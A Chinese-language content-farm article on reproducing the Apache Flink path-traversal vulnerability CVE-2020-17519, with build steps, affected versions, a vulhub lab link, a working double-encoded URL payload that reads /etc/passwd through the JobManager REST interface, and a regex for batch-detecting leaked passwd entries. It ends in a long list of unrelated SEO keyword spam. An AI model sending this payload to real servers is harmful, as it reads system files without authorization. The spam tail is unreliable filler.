如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,今天就跟大家聊聊有关如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
千家信息网最后更新 2025年12月02日如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现
今天就跟大家聊聊有关如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
Apache Flink 是高效和分布式的通用数据处理平台。
Apache Flink 声明式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的编程和扩展性,具有强大的流处理和批处理功能。同时在并行数据库发现查询优化方案。
要求Unix 类环境(Linux, Mac OS X, Cygwin)gitMaven (at least version 3.0.4)Java 6, 7 or 8 (Note that Oracle's JDK 6 library will fail to build Flink, but is able to run a pre-compiled package without problem)git clone https://github.com/apache/incubator-flink.gitcd incubator-flinkmvn clean package -DskipTests # this will take up to 5 minutes
Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
从官方文档来看 只能在UINX系统运行
影响版本:
1.11.0
1.11.1
1.11.2
Docker地址:
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
POC:
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Python批量检测脚本:
提供下正则:
pattern=re.compile( r"((root|bin|daemon|sys|sync|games|man|mail|news|www-data|uucp|backup|list|proxy|gnats|nobody" r"|syslog|mysql" r"|bind|ftp|sshd|postfix):[\d\w\-\s,]+:\d+:\d+:[\w\-_\s,]*:[\w\-_\s,\/]*:[\w\-_," r"\/]*[\r\n])") re_html=pattern.findall(html)
本地新建host.txt
放入要检测的url回车分割
逐行读取
看完上述内容,你们对如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。
内容
数据
系统
漏洞
路径
分布式
平台
文件
版本
处理
检测
强大
为此
作者
使用者
功能
同时
后果
地址
官方
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
搭建服务器需要多少兆的宽带
5g基带软件开发工程师
希沃网络安全
宜章安卓软件开发学校
csgo被社区服务器踢了怎么办
耳机主板软件开发平台有哪些
河北精英网络技术服务计划表
辽宁大型软件开发
初中学历学软件开发合适吗
江西综合软件开发市价
ip地址和服务器有什么关联
服务器维护安全培训
在那购买服务器
网络安全在国防中的重要意义
网络服务器vps是什么
网络安全与管理期末考试
宁畅R640服务器
滨州关于开展全市网络安全检查
泰兴小型网络技术批发价
网络安全法中的重大危险源
服务器怎么映射当前电脑
2018年金融行业网络安全
海南标准机架服务器在哪买
网络安全策略预防
江苏省教育网络安全与信息化
数据库进阶
2014数据库怎么改
苏州mac软件开发
大学生为网络安全要做什么
excel导入数据库的数据